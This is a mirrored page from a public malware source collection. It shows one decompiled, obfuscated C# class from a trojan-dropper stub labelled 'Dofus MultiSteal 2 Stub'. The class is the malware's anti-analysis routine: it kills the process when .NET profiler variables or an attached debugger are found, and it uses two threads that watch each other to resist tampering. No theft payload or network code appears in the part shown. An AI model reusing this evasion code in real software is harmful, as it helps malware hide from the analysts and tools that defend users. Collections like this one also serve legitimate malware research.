mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
78 lines
2.7 KiB
C#
78 lines
2.7 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: ⟛礡✩ꏯ隨䫖<E99AA8>킎
|
||
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
|
||
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
|
||
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.Runtime.InteropServices;
|
||
using System.Threading;
|
||
|
||
internal static class \u27DB礡\u2729ꏯ隨䫖\uFFFD킎
|
||
{
|
||
[DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
||
private static extern int 鸬闰\uEB56㵐놽\uF06A墾㐠(
|
||
IntPtr ProcessHandle,
|
||
int ProcessInformationClass,
|
||
byte[] ProcessInformation,
|
||
uint ProcessInformationLength,
|
||
out int ReturnLength);
|
||
|
||
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
||
private static extern uint 碾왊溈莝舡䎸껈홫(
|
||
IntPtr ProcessHandle,
|
||
int ProcessInformationClass,
|
||
byte[] ProcessInformation,
|
||
uint ProcessInformationLength);
|
||
|
||
[DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
|
||
private static extern bool ꭍ㙸ሕ\u2E96\uFFFD\u0AF6繥߮(IntPtr hObject);
|
||
|
||
public static void 膒\uF296\u2595ꗫ燞\uFFDDﹱ蔙()
|
||
{
|
||
switch (Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING"))
|
||
{
|
||
case null:
|
||
switch (Environment.GetEnvironmentVariable("COR_PROFILER"))
|
||
{
|
||
case null:
|
||
break;
|
||
default:
|
||
goto label_1;
|
||
}
|
||
break;
|
||
default:
|
||
label_1:
|
||
Environment.FailFast("Profiler detected");
|
||
break;
|
||
}
|
||
Thread parameter1 = new Thread(new ParameterizedThreadStart(\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.䪕햰㯴濈ⷁ졥蜞洊));
|
||
Thread parameter2 = new Thread(new ParameterizedThreadStart(\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.䪕햰㯴濈ⷁ졥蜞洊));
|
||
parameter1.IsBackground = true;
|
||
parameter2.IsBackground = true;
|
||
parameter1.Start((object) parameter2);
|
||
Thread.Sleep(500);
|
||
parameter2.Start((object) parameter1);
|
||
}
|
||
|
||
private static void 䪕햰㯴濈ⷁ졥蜞洊(object thread)
|
||
{
|
||
Thread.Sleep(1000);
|
||
Thread thread1 = (Thread) thread;
|
||
while (true)
|
||
{
|
||
if (Debugger.IsAttached || Debugger.IsLogging())
|
||
goto label_5;
|
||
label_1:
|
||
if (!thread1.IsAlive)
|
||
Environment.FailFast("Loop broken");
|
||
Thread.Sleep(1000);
|
||
continue;
|
||
label_5:
|
||
Environment.FailFast("Debugger detected (Managed)");
|
||
goto label_1;
|
||
}
|
||
}
|
||
}
|